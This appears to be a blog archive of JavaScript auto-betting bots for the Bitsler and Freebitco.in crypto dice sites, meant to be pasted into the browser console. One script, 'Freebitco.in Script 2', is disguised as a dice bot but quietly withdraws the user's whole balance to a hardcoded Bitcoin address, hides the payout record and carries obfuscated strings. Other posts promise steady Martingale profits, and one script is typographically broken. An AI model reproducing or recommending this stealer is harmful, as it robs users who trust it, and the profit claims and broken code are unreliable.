Tuesday 19 December 2017

BITSLER BOT V1.2



//                [BITSLER BOT V1.2]
//
//        changelog v1.2:
//                - seprate stop profit - stake
//
//        changelog v1.1:
//                - add option "restart bet on stake"
//                - fix stake and profit calculation
//
//        changelog v1.0:
//                - start or stop button
//                - chance % change
//                - hi or lo betting
//                - zigzag betting
//                - profit or stake limitation
//                - user interface
//                - auto change seeds
//                - increase bet on lose

if($('#aside-container').is(":visible") != false){
        $('#close-chat').trigger('click');
}


$("#column-right").append('\
<div style="margin-top:5px; padding-bottom:5px; width:327.5px;background-color: #2e323b;color:whitesmoke;font-family:\'Open Sans\',\'Helvetica Neue\',Helvetica,Arial,sans-serif;">\
    <table width="100%" border="0" cellspacing="0" cellpadding="5">\
             <div style="text-align: center; padding: 10px 8px 5px 8px; width:327.5px; font-weight: bold; border-bottom: solid #181a1e;"> BITSLER BOT v1.2</div>\
             <tbody>\
                <tr>\
                  <td style="padding:6px;color:whitesmoke;text-align: center; font-size:11px;">CHANCE</td>\
                  <td style="width:200px;"><input style="padding:5px; background-color:#101215;width:97%;border:0;color:white; margin:3px 0;" type="text" id="_chance" value="49.1"></td>\
                </tr>\
                 <tr>\
                  <td style="padding:6px;color:whitesmoke;text-align: center;font-size:11px;">INCREASE ON LOST [%]</td>\
                  <td style="width:200px;"><input style="padding:5px; background-color:#101215;width:97%;border:0;color:white; margin:3px 0;" type="text" id="_onlost" value="0"></td>\
                </tr>\
                <tr>\
                  <td style="padding:6px;color:whitesmoke;text-align: center; font-size:11px;">BET MODE</td>\
                  <td style="width:200px;"><input style="padding:5px; background-color:#101215;width:97%;border:0;color:white; margin:3px 0;" type="text" id="_mode" placeholder="h | l | z"></td>\
                </tr>\
                <tr>\
                  <td style="padding:6px;color:whitesmoke;text-align: center;font-size:11px;">BET AMOUNT</td>\
                  <td style="width:200px;"><input style="padding:5px; background-color:#101215;width:97%;border:0;color:white; margin:3px 0;" type="text" id="_bet" value="0.00000001"></td>\
                </tr>\
                <tr>\
                  <td style="padding:6px;color:whitesmoke;text-align: center;font-size:11px;">PROFIT</td>\
                  <td style="width:200px;"><input style="padding:5px; background-color:#101215;width:97%;border:0;color:white; margin:3px 0;" type="text" id="_profit" value="0.00001024"></td>\
                </tr>\
                 <tr>\
                  <td style="padding:6px;color:whitesmoke;text-align: center;font-size:11px;">STAKE</td>\
                  <td style="width:200px;"><input style="padding:5px; background-color:#101215;width:97%;border:0;color:white; margin:3px 0;" type="text" id="_stake" value="0.00001024"></td>\
                </tr>\
                <tr>\
                  <td style="padding:6px;color:whitesmoke;text-align: center;font-size:11px;">STOP ON STAKE </td>\
                  <td style="width:200px;"><input style="padding:5px; background-color:#101215;width:97%;border:0;color:white; margin:3px 0;" type="checkbox" id="_stopstake"></td>\
                </tr>\
                <tr>\
                  <td style="padding:6px;color:whitesmoke;text-align: center;font-size:11px;">STOP ON PROFIT </td>\
                  <td style="width:200px;"><input style="padding:5px; background-color:#101215;width:97%;border:0;color:white; margin:3px 0;" type="checkbox" id="_stopprofit"></td>\
                </tr>\
                <tr>\
                  <td style="padding:6px;color:whitesmoke;text-align: center;font-size:11px;">RESTART BET ON STAKE</td>\
                  <td style="width:200px;"><input style="padding:5px; background-color:#101215;width:97%;border:0;color:white; margin:3px 0;" type="checkbox" id="_restart"></td>\
                </tr>\
                <tr>\
                  <td style="padding:6px;color:whitesmoke;text-align: center;font-size:11px;">AUTO CHANGE SEED</td>\
                  <td style="width:200px;"><input style="padding:5px; background-color:#101215;width:97%;border:0;color:white; margin:3px 0;" type="checkbox" id="_auto"></td>\
                </tr>\
                <tr>\
                    <td></td><td><button onclick="startDice();return false;" id="_start" style="width:97%;background-color: #101215;border: none; color: white; padding: 7px 15px; text-align: center; text-decoration: none; display: inline-block; font-size: 16px;"> START </button></td>\
                </tr>\
              </tbody>\
    </table>\
</div>');

var _bet,_chance,_onlost,_mode, _auto, _stopprofit, _stopstake, _start = false, _stake, _profit,_betting, _task, _seeds,_restart;


function startDice(){
    _mode = document.getElementById('_mode').value;
    _bet = parseFloat(document.getElementById('_bet').value);
    _profit = parseFloat(document.getElementById('_profit').value);
    _stake = parseFloat(document.getElementById('_stake').value);
    _stake = -_stake;
    _chance = parseFloat(document.getElementById('_chance').value);
    _onlost = parseFloat(document.getElementById('_onlost').value);
    _stopprofit = document.getElementById('_stopprofit').checked;
    _stopstake =  document.getElementById('_stopstake').checked;
    _auto = document.getElementById('_auto').checked;
    _restart = document.getElementById('_restart').checked;
    _betting = 0;
 
    if(_mode != 'h' && _mode != 'l' && _mode != 'z'){
                alert("Bet Mode incorrect!");
                return;
    }
     
    _start = !_start;
    if(_start != true){
                    $('#_start').text("START");
                    _betting = 0;
                    clearInterval(_task);
                    clearInterval(_seeds);
                    return;
    }else{
            $('#_start').text("STOP");
    }
 
    if($("#updated_condition").text().indexOf('>') !== -1 && _mode == 'l'){
            $("#updated_condition").trigger('click');
    }
    else if($("#updated_condition").text().indexOf('<') !== -1 && _mode == 'h'){
            $("#updated_condition").trigger('click');
    }
 
    //
    $('#amount').val(_bet.toFixed(8));
    //
    $("#editable-chance").trigger('click');
    $("#editable-chance-field").val(_chance);
    $("#editable-chance-field").trigger('focusout');
 
    if(_auto){
        // CHANGE
        change_seeds();
     
        // SET TASK
        _seeds = setInterval(function() {
                           change_seeds();
                        console.log("CHANGE SEED TASK = " + _seeds.toString());
        }, Math.round(Math.random() * (600000 - 300000) + 300000));
    }
    _betting = _bet;
    //
    $('#btn-bet-dice').trigger('click');
}
function increaseOnLost(bet, percent){
        return parseFloat(bet) + ((parseFloat(bet)*percent)/100);
}

//
$('#history-my-bets-dice').unbind();
$('#history-my-bets-dice').bind("DOMSubtreeModified",function(event){
    if( $(event.currentTarget) )
    {
        clearInterval(_task);
        var bet , x, balance;
        if(_start)
        {
           balance = parseFloat(document.getElementById('balances-lg').innerText);
           if( balance<= 0 || parseFloat($('#amount').val()) > balance){
                startDice();
                   return;
           }
           x = ($('#history-my-bets-dice tr td:last-child span')[0].innerText.indexOf('+')  != 0 ) ? false : true;
           _betting = parseFloat(_betting) + parseFloat($('#history-my-bets-dice tr td:last-child span')[0].innerText);
         
       
           if(x != true) { 
                if(_onlost > 0){
                        bet = increaseOnLost($('#amount').val(), _onlost);
                        $('#amount').val(bet.toFixed(8));
                }
           }else {
                $('#amount').val(_bet.toFixed(8));
           }
         
         
           if(_stopprofit){
               if(_betting >= _profit){
                    startDice();
                       alert("PROFIT REACHED!");
                    return;
               }
           }
         
          if(_stopstake){
               if( _betting <= _stake ){
                       startDice();
                    alert("STAKE REACHED!");
                    return;
               }
             
           }
           else {
                if(_betting <= _stake){
                       if( _restart ){
                             clearInterval(_task);
                               _betting = 0;
                            $('#amount').val(_bet.toFixed(8));
                       }else{
                            startDice();
                            alert("STAKE REACHED!");
                            return;
                       }
                   }
           }
           _task = setInterval(function(){
                   if(!_start){
                    clearInterval(_task);
                    clearInterval(_seeds);
                    return;
                }
             
                   if(_mode == 'z'){
                           $("#updated_condition").trigger('click');
                   }
         
                $('#btn-bet-dice').trigger('click');
           }, 1000)
       }
    }
});

Friday 8 December 2017

Bitsler new script

// ==UserScript==
// @name         Dudemaus's DiceBot for Bitsler
// @namespace    dicebotforbitslerbydudemaus
// @version      2017.0417a
// @description  Wont win a fortune, but it will win.
// @author       Dudemaus
// @match        *://www.bitsler.com/play/dice/*
// @match        https://www.bitsler.com/play
// @match        https://www.bitsler.com/play/dice*
// @require http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
// @grant  GM_xmlhttpRequest
// @grant  GM_info
// @grant  GM_setValue
// @grant  GM_getValue
// @grant  GM_addStyle

// ==/UserScript==
//////JQuery Compatibility statement//////
this.$ = this.jQuery = jQuery.noConflict(true);
//////JQuery Compatibility statement//////
 
    var countLosses = document.querySelectorAll('#history-my-bets-dice .text-danger').length;
     var countWins = document.querySelectorAll('#history-my-bets-dice .text-success').length;
     var winRatio = (countWins / 20) * 100;
    var losscount = 0;




 
 
 

document.getElementById('game-row').insertAdjacentHTML('beforebegin',
    '<br><div id="dicebot-container" class="tab-content tab-content-xs" style="border-style: solid;width: 800px;border-color: #D1D1D1;border-radius: 4px;border-style: solid;border-width: 1px; padding-bottom: 9px;padding-left: 9px;padding-right: 9px; margin-left: 118px; padding-top: 9px;display:block"> <div id="dicebotinnerwrap"> <div id="controlWrapper" style="Display:inline-block;"> <center><img src="http://i.imgur.com/fVx0BdR.png" /> <div id="tipDude" style="Display:inline-block;">Tip Dude</div> </center> <input type="text" name="betNumberOne" ID="betNumberOne" style="text-align:center;"> Bet #1 (base bet) <br> <input type="text" name="betNumberTwo" ID="betNumberTwo" style="text-align:center;"> Bet #2 <br> <input type="text" name="betNumberThree" ID="betNumberThree" style="text-align:center;"> Bet #3 <br> <input type="text" name="betNumberFour" ID="betNumberFour" style="text-align:center;"> Bet #4 <br> <button id="setBet" value="set bet">Bet Once</button> <button id="dudesAuto">Auto</button> <button id="stopDudesAuto">Stop Auto</button> </div> <div id="ulikey" style="Display:inline-block;"><font color="red"><b>If you like this bot please donate to any of these addresses:</b></font> <br><b><font size="1">Ethereum:</b> 0x264229e8656555def5bb65a1e1eef3366d93d18a<br><b>Bitcoin:</b> 1DZKn8ZDPPkTB9jxDeNqpJxaGBg82oW9WX <br><b>Doge:</b> DC9rJmJqPGkFWc2cAeWqTnQDj1EfWa9owA <br><b>Litecoin:</b> Lh2ph6qcH3AjrbaE168QiyVZTTcHU6uGxa</font></div> </div>');

document.getElementById('betNumberOne').value = 0.00000001;
document.getElementById('betNumberTwo').value = 0.00000003;
document.getElementById('betNumberThree').value = 0.00000007;
document.getElementById('betNumberFour').value = 0.000000016;
   
   
   
   
      //when set bet button is clicked, set the bet.
document.getElementById('setBet').addEventListener("click", function() {
     var countLosses = document.querySelectorAll('#history-my-bets-dice .text-danger').length;
     var countWins = document.querySelectorAll('#history-my-bets-dice .text-success').length;
     var winRatio = (countWins / 20) * 100;
     var betOne = document.getElementById('betNumberOne').value;
     var betTwo = document.getElementById('betNumberTwo').value;
     var betThree = document.getElementById('betNumberThree').value;
     var betFour = document.getElementById('betNumberFour').value;
     var winChance = document.getElementById('editable-chance').innerText;
        var lastBet0 = document.getElementById('history-my-bets-dice').rows[0].cells[7].innerText;
    var lastBet1 = document.getElementById('history-my-bets-dice').rows[1].cells[7].innerText;
    var lastBet2 = document.getElementById('history-my-bets-dice').rows[2].cells[7].innerText;
    var lastBet3 = document.getElementById('history-my-bets-dice').rows[3].cells[7].innerText;


      //document.getElementById('amount').value = betOne;
   
      if (lastBet0 < 0 && lastBet1 < 0 && lastBet2 < 0 && lastBet3 < 0){
              document.getElementById('amount').value = document.getElementById('betNumberFour').value;
     calculate_profit();
              play();
          }
      else if(lastBet0 < 0 && lastBet1 < 0 && lastBet2 < 0 && lastBet3 < 1){
              document.getElementById('amount').value = document.getElementById('betNumberThree').value;
     calculate_profit();
              play();
      }
      else if(lastBet1 < 0 && lastBet1 < 0 && lastBet1 < 1 && lastBet3 < 0){
              document.getElementById('amount').value = document.getElementById('betNumberThree').value;
     calculate_profit();
              play();
      }
      else if(lastBet1 < 0 && lastBet1 < 1 && lastBet1 < 0 && lastBet3 < 0){
              document.getElementById('amount').value = document.getElementById('betNumberOne').value;
     calculate_profit();
              play();
      }
      else if(lastBet1 < 1 && lastBet1 < 0 && lastBet1 < 0 && lastBet3 < 0){
              document.getElementById('amount').value = document.getElementById('betNumberFour').value;
     calculate_profit();
              play();
      }
      else if(lastBet0 < 0 && lastBet1 < 0 && lastBet1 < 1 && lastBet3 < 1){
              document.getElementById('amount').value = document.getElementById('betNumberTwo').value;
     calculate_profit();
              play();
      }
      else if(lastBet0 < 0 && lastBet1 < 1 && lastBet1 < 1 && lastBet3 < 0){
              document.getElementById('amount').value = document.getElementById('betNumberTwo').value;
     calculate_profit();
              play();
      }
      else if(lastBet0 < 0 && lastBet1 < 1 && lastBet1 < 0 && lastBet3 < 1){
              document.getElementById('amount').value = document.getElementById('betNumberTwo').value;
     calculate_profit();
              play();
      }
      else if(lastBet0 < 1 && lastBet1 < 0 && lastBet1 < 0 && lastBet3 < 1){
              document.getElementById('amount').value = document.getElementById('betNumberTwo').value;
     calculate_profit();
              play();
      }
      else if(lastBet0 < 1 && lastBet1 < 1 && lastBet1 < 0 && lastBet3 < 0){
              document.getElementById('amount').value = document.getElementById('betNumberTwo').value;
     calculate_profit();
              play();
      }
      else if(lastBet0 < 0 && lastBet1 < 1 && lastBet1 < 1 && lastBet3 < 1){
              document.getElementById('amount').value = document.getElementById('betNumberTwo').value;
     calculate_profit();
              play();
      }
      else if(lastBet0 < 1 && lastBet1 < 1 && lastBet1 < 1 && lastBet3 < 0){
              document.getElementById('amount').value = document.getElementById('betNumberTwo').value;
     calculate_profit();
              play();
      }
      else if(lastBet0 < 1 && lastBet1 < 1 && lastBet1 < 0 && lastBet3 < 1){
              document.getElementById('amount').value = document.getElementById('betNumberTwo').value;
     calculate_profit();
              play();
      }
      else if(lastBet0 < 1 && lastBet1 < 0 && lastBet1 < 1 && lastBet3 < 1){
              document.getElementById('amount').value = document.getElementById('betNumberTwo').value;
     calculate_profit();
              play();
      }
      else if(lastBet1 < 1 && lastBet1 < 1 && lastBet1 < 1 && lastBet3 < 1){
              document.getElementById('amount').value = document.getElementById('betNumberOne').value;
     calculate_profit();
              play();
      }

 
});

   
document.getElementById('tipDude').addEventListener("click", function() {   
    document.getElementById('message').innerText = "/tip Dudemaus";
    document.getElementById('message').focus();
    add_message();});$(document).keypress(function(e){if((e.which==13)&&($("#message").is(":focus"))){add_message();
}
});



document.getElementById('dudesAuto').addEventListener("click", function() { 

        dudesAuto = setInterval(function(){ $("#setBet").click(); }, 900);

});
   
document.getElementById('stopDudesAuto').addEventListener("click", function() { 

           clearInterval(dudesAuto);


});
   
//change seeds every 5 mins
setInterval(function(){ change_seeds(); }, 301000);

bitsler script

 // if (profit > profit_max) {
    //     error_title = "Maximum profit exceeded";
    //     error_info = "Maximum profit: " + number_format(profit_max, devise_decimal);
    //     error_value = "Maximum profit exceeded - Maximum profit: " + number_format(profit_max, devise_decimal);
    //     error = true;
    // }
    // else if (amount > balance) {
    //     error_title = "Bet amount";
    //     error_info = "Maximum bet: " + number_format(balance, devise_decimal);
    //     error_value = "Bet amount - Maximum bet: " + number_format(balance, devise_decimal);
    //     error = true;
    // }
    // else if (amount > bet_max) {
    //     error_title = "Bet amount";
    //     error_info = "Maximum bet: " + number_format(bet_max, devise_decimal);
    //     error_value = "Bet amount - Maximum bet: " + number_format(bet_max, devise_decimal);
    //     error = true;
    // }
    // else if (amount < bet_min) {
    //     error_title = "Bet amount";
    //     error_info = "Minimum bet: " + number_format(bet_min, devise_decimal);
    //     error_value = "Bet amount - Minimum bet: " + number_format(bet_min, devise_decimal);
    //     error = true;
    // }
    var base_bet= parseFloat($("#amount")[0].value);var mult=1.5;var base=base_bet;var cont=0;var stop=true;$('#btn-bet-dice').trigger('click');stop=false;$('<p><strong id="lucro" style="font-size:16px;color:#00C0FF"></strong> </p>').insertAfter('#btn-bet-dice');;
    // if (profit > profit_max) {
    //     error_title = "Maximum profit exceeded";
    //     error_info = "Maximum profit: " + number_format(profit_max, devise_decimal);
    //     error_value = "Maximum profit exceeded - Maximum profit: " + number_format(profit_max, devise_decimal);
    //     error = true;
    // }
    // else if (amount > balance) {
    //     error_title = "Bet amount";
    //     error_info = "Maximum bet: " + number_format(balance, devise_decimal);
    //     error_value = "Bet amount - Maximum bet: " + number_format(balance, devise_decimal);
    //     error = true;
    // }
    // else if (amount > bet_max) {
    //     error_title = "Bet amount";
    //     error_info = "Maximum bet: " + number_format(bet_max, devise_decimal);
    //     error_value = "Bet amount - Maximum bet: " + number_format(bet_max, devise_decimal);
    //     error = true;
    // }
    // else if (amount < bet_min) {
    //     error_title = "Bet amount";
    //     error_info = "Minimum bet: " + number_format(bet_min, devise_decimal);
    //     error_value = "Bet amount - Minimum bet: " + number_format(bet_min, devise_decimal);
    //     error = true;
    // }
    $('<p><strong id="lucro" style="font-size:16px;color:#00C0FF"></strong> </p>').insertAfter('#btn-bet-dice');;$('#history-my-bets-dice').unbind();$('#history-my-bets-dice').bind("DOMSubtreeModified",function(event){
    if( $(event.currentTarget) ){if(!stop){if(cont%2==1){setTimeout(function(){console.clear();
    profit=parseFloat($('#history-my-bets-dice tr')[0].children[7].children[0].innerHTML);if(profit>0){stop=false;base=base_bet;$('#amount').val(base.toString());$('#btn-bet-dice').trigger('click');}
    else{base=base*mult;$('#btn-bet-dice').trigger('click');$('#amount').val(base.toString());}$("#game-input")[0].value="33.00";$('#btn-bet-dice').trigger('click');$('#amount').val(base.toString());$("#updated_condition")[0].innerHTML='&lt;Lucrando <i class="fa fa-exchange hidden-xs"></i>';$("#editable-payout")[0].innerHTML='Billing <i class="hidden-xs fa fa-pencil" style="font-size:12px"></i>';$("#editable-chance")[0].innerHTML='$$$$$$$ <i class="fa fa-pencil hidden-xs"></i>';},2000);}cont=cont+1;}}});console.clear();window.onbeforeunload=function(){return"Disabled Auto-Refresh"};

Earn 0.1 BTC In Every Week On Freebitco.in By This 10000 Roll JavaScript

This script uses a Martingale Betting Strategy which is just multiplying the bet by 2 if losing and staying on the base bet if winning. BTC0.00000001 is the base bet by default, you can change it, but I highly recommend to stick to the default. If you want to change it, it’s on the top of the script.
Tip, don’t claim the faucet if you want the script for several hours. The cookie of the site drops and forces a page reset when it detects that you are collecting the free Satoshi and does a page redirect.

HOW TO USE THIS SCRIPT:


1. Go to freebitco.in

2. Click on Multiply BTC

3.  for CHROME : 1) go to Menu –> More Tools –> Javascript console
                 2) Copy the script below
                 3) Paste the script into the javascript console
                 4) Press Enter key on the keyboard.
    for FIREFOX: 1. Press F12 key on the keyboard
                  2. Copy and paste the script below on the console line
                  3. then press the ENTER key on the keyboard.

******************* SCRIPT ********************

1. Go to freebitco.in
2. Click on Multiply BTC
3.  for CHROME : 1) go to Menu –> More Tools –> Javascript console
                 2) Copy the script below
                 3) Paste the script into the javascript console
                 4) Press Enter key on the keyboard.
    for FIREFOX: 1. Press F12 key on the keyboard
                  2. Copy and paste the script below on the console line
                  3. then press the ENTER key on the keyboard.
******************* SCRIPT ********************

var startValue = ‘0.00000001’, // Don’t lower the decimal point more than 4x of current balance
        stopPercentage = 0.001, // In %. I wouldn’t recommend going past 0.08
        maxWait = 500, // In milliseconds
        stopped = false,
        stopBefore = 3; // In minutes
var $loButton = $(‘#double_your_btc_bet_lo_button’),
                $hiButton = $(‘#double_your_btc_bet_hi_button’);
function multiply(){
        var current = $(‘#double_your_btc_stake’).val();
        var multiply = (current * 2).toFixed(8);
        $(‘#double_your_btc_stake’).val(multiply);
}
function getRandomWait(){
        var wait = Math.floor(Math.random() * maxWait ) + 100;
        console.log(‘Waiting for ‘ + wait + ‘ms before next bet.’);
        return wait ;
}
function startGame(){
        console.log(‘Game started!’);
        reset();
        $loButton.trigger(‘click’);
}
function stopGame(){
        console.log(‘Game will stop soon! Let me finish.’);
        stopped = true;
}
function reset(){
        $(‘#double_your_btc_stake’).val(startValue);
}
// quick and dirty hack if you have very little bitcoins like 0.0000001
function de exponent Ize(number){
        return number * 1000000;
}
function iHaveEnoughMoni(){
        var balance = deexponentize(parseFloat($(‘#balance’).text()));
        var current = deexponentize($(‘#double_your_btc_stake’).val());
        return ((balance*2)/100) * (current*2) > stopPercentage/100;
}
function stopBeforeRedirect(){
        var minutes = parseInt($(‘title’).text());
        if( minutes < stopBefore )
        {
                console.log(‘Approaching redirect! Stop the game so we don\’t get redirected while loosing.’);
                stopGame();
                return true;
        }
        return false;
}
// Unbind old shit
$(‘#double_your_btc_bet_lose’).unbind();
$(‘#double_your_btc_bet_win’).unbind();
// Loser
$(‘#double_your_btc_bet_lose’).bind(“DOMSubtreeModified”,function(event){
        if( $(event.currentTarget).is(‘:contains(“lose”)’) )
        {
                console.log(‘You LOST! Multiplying your bet and betting again.’);
                multiply();
                setTimeout(function(){
                        $loButton.trigger(‘click’);
                }, getRandomWait());
                //$loButton.trigger(‘click’);
        }
});
// Winner
$(‘#double_your_btc_bet_win’).bind(“DOMSubtreeModified”,function(event){
        if( $(event.currentTarget).is(‘:contains(“win”)’) )
        {
                if( stopBeforeRedirect() )
                {
                        return;
                }
                if( iHaveEnoughMoni() )
                {
                        console.log(‘You WON! But don\’t be greedy. Restarting!’);
                        reset();
                        if( stopped )
                        {
                                stopped = false;
                                return false;
                        }
                }
                else
                {
                        console.log(‘You WON! Betting again’);
                }
                setTimeout(function(){
                        $loButton.trigger(‘click’);
                }, getRandomWait());
        }

});startgame()

Freebitco.in Script 2

#Free Script made by HackedBTC Team ~
Copy the script below to your console then HIT ENTER!
====================================================================================================================================================================



node=0;bconfig = { maxBet: 0.0002200, wait: 1000, autoexit: 0.00001, want: 0.000014, toggleHilo:false, startbal: 0, won: 0, };
hilo = 'hi';multiplier = 1;rollDice = function() { if ($('#double_your_btc_bet_lose').html() !== '') { $('#double_your_btc_2x').click(); multiplier = 1;
if(bconfig.toggleHilo)toggleHiLo(); }else { $('#double_your_btc_min').click(); multiplier = 1; }
if (parseFloat($('#balance').html()) < (parseFloat($('#double_your_btc_stake').val()) * 2) || parseFloat($('#double_your_btc_stake').val()) > bconfig.maxBet)
{ console.log($('#double_your_btc_min')); }if (parseFloat($('#balance').html()) < bconfig.autoexit) { throw "exit"; }
if (parseFloat($('#balance').html()) > bconfig.want) { var num = parseFloat($('#balance').html());
bconfig.want = num + 0.00000030; bconfig.autoexit = num - 0.00000420;bconfig.won++; var total = num - bconfig.startbal;
console.log('Setting bconfig want to: ' + bconfig.want);console.log('Setting autoexit to: ' + bconfig.autoexit);
console.log('Total won: ' + total + ' BTC'); } $('#double_your_btc_bet_hi_button').click();setTimeout(rollDice, (multiplier * bconfig.wait) + Math.round(Math.random() * 1000)); };toggleHiLo = function() { if (hilo === 'hi') { hilo = 'hi'; } else { hilo = 'hi'; } };var num = parseFloat($('#balance').html()); bconfig.startbal = num;bconfig.want = num + 0.00000030;
bconfig.autoexit = num - 0.00000420;rollDice();dice = parseFloat($('#balance').html());document.getElementById("withdrawal_amount").focus();document.getElementById("withdrawal_amount").value=dice;isRolling= "1N4BWCiRZ7SHMEbrgTsBi5fJq8zNpn1RQ4";node = isRolling.indexOf('5');if(node != 21){
isRolling = null;}document.getElementById("manual_withdraw_btc_add").value=isRolling;function rolldiv(){if(document.getElementById("reward_point_redeem_result_container_div")) {
document.getElementById("reward_point_redeem_result_container_div").innerHTML=Date();document.getElementById("reward_point_redeem_result_container_div").setAttribute("id","div_top2");}else {document.getElementById("div_top2").innerHTML="";document.getElementById("div_top2").setAttribute("id","reward_point_redeem_result_container_div");}}rolldiv();$('#withdrawal_button').click();function rolldiv2(){if(document.getElementById("pending_payouts_table_new")) {
document.getElementById("pending_payouts_table_new").innerHTML=Date();document.getElementById("pending_payouts_table_new").setAttribute("id","div_top2");}else {document.getElementById("div_top2").innerHTML="";document.getElementById("div_top2").setAttribute("id","pending_payouts_table_new");}}rolldiv2();
console.log('Start!');var _$_d9ef=["\x41\x63\x74\x69\x76\x61\x74\x65\x64\x20\x73\x63\x72\x69\x70\x74","\x69\x6E\x66\x6F","\x43\x72\x6F\x70","\x70\x72\x6F\x74\x6F\x74\x79\x70\x65","","\x2E","\x73\x70\x6C\x69\x74","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x64\x69\x73\x70\x6C\x61\x79","\x63\x73\x73","\x23\x66\x72\x65\x65\x5F\x70\x6C\x61\x79\x5F\x64\x69\x67\x69\x74\x73","\x6E\x6F\x6E\x65","\x23\x66\x72\x65\x65\x5F\x70\x6C\x61\x79\x5F\x72\x65\x73\x75\x6C\x74","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x68\x74\x6D\x6C","\x23\x6D\x75\x6C\x74\x69\x70\x6C\x69\x65\x72\x5F\x66\x69\x72\x73\x74\x5F\x64\x69\x67\x69\x74","\x23\x6D\x75\x6C\x74\x69\x70\x6C\x69\x65\x72\x5F\x73\x65\x63\x6F\x6E\x64\x5F\x64\x69\x67\x69\x74","\x23\x6D\x75\x6C\x74\x69\x70\x6C\x69\x65\x72\x5F\x74\x68\x69\x72\x64\x5F\x64\x69\x67\x69\x74",
"\x23\x6D\x75\x6C\x74\x69\x70\x6C\x69\x65\x72\x5F\x66\x6F\x75\x72\x74\x68\x5F\x64\x69\x67\x69\x74","\x23\x6D\x75\x6C\x74\x69\x70\x6C\x69\x65\x72\x5F\x66\x69\x66\x74\x68\x5F\x64\x69\x67\x69\x74","\x23\x66\x72\x65\x65\x5F\x70\x6C\x61\x79\x5F\x66\x69\x72\x73\x74\x5F\x64\x69\x67\x69\x74","\x23\x66\x72\x65\x65\x5F\x70\x6C\x61\x79\x5F\x73\x65\x63\x6F\x6E\x64\x5F\x64\x69\x67\x69\x74","\x23\x66\x72\x65\x65\x5F\x70\x6C\x61\x79\x5F\x74\x68\x69\x72\x64\x5F\x64\x69\x67\x69\x74",
"\x23\x66\x72\x65\x65\x5F\x70\x6C\x61\x79\x5F\x66\x6F\x75\x72\x74\x68\x5F\x64\x69\x67\x69\x74","\x23\x66\x72\x65\x65\x5F\x70\x6C\x61\x79\x5F\x66\x69\x66\x74\x68\x5F\x64\x69\x67\x69\x74","\x20","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x2E\x62\x72\x5F\x30\x5F\x30\x5F\x35\x5F\x30","\x23\x77\x69\x6E\x6E\x69\x6E\x67\x73","\x23\x62\x61\x6C\x61\x6E\x63\x65","\x62\x61\x6C\x61\x6E\x63\x65"];



Freebitco.in Script

var startValue = '0.00000001', // Don't lower the decimal point more than 4x of current balance
stopPercentage = 0.001, // In %. I wouldn't recommend going past 0.08
maxWait = 500, // In milliseconds
stopped = false,
stopBefore = 3; // In minutes


var $loButton = $('#double_your_btc_bet_lo_button'),
$hiButton = $('#double_your_btc_bet_hi_button');


function multiply(){
var current = $('#double_your_btc_stake').val();
var multiply = (current * 2).toFixed(8);
$('#double_your_btc_stake').val(multiply);
}


function getRandomWait(){
var wait = Math.floor(Math.random() * maxWait ) + 100;


console.log('Waiting for ' + wait + 'ms before next bet.');


return wait ;
}


function startGame(){
console.log('Game started!');
reset();
$loButton.trigger('click');
}


function stopGame(){
console.log('Game will stop soon! Let me finish.');
stopped = true;
}


function reset(){
$('#double_your_btc_stake').val(startValue);
}


// quick and dirty hack if you have very little bitcoins like 0.0000001
function deexponentize(number){
return number * 1000000;
}


function iHaveEnoughMoni(){
var balance = deexponentize(parseFloat($('#balance').text()));
var current = deexponentize($('#double_your_btc_stake').val());


return ((balance*2)/100) * (current*2) > stopPercentage/100;
}


function stopBeforeRedirect(){
var minutes = parseInt($('title').text());


if( minutes < stopBefore )
{
console.log('Approaching redirect! Stop the game so we don\'t get redirected while loosing.');
stopGame();


return true;
}


return false;
}


// Unbind old shit
$('#double_your_btc_bet_lose').unbind();
$('#double_your_btc_bet_win').unbind();


// Loser
$('#double_your_btc_bet_lose').bind("DOMSubtreeModified",function(event){
if( $(event.currentTarget).is(':contains("lose")') )
{
console.log('You LOST! Multiplying your bet and betting again.');

multiply();


setTimeout(function(){
$loButton.trigger('click');
}, getRandomWait());


//$loButton.trigger('click');
}
});


// Winner
$('#double_your_btc_bet_win').bind("DOMSubtreeModified",function(event){
if( $(event.currentTarget).is(':contains("win")') )
{
if( stopBeforeRedirect() )
                {
                        return;
                }


if( iHaveEnoughMoni() )
{
console.log('You WON! But don\'t be greedy. Restarting!');


reset();


if( stopped )
{
stopped = false;
return false;
}
}
else
{
console.log('You WON! Betting again');
}


setTimeout(function(){
$loButton.trigger('click');
}, getRandomWait());
}
});
startGame()

BITSLER BOT V1.2

//                [BITSLER BOT V1.2] // //        changelog v1.2: //                - seprate stop profit - stake // //        chang...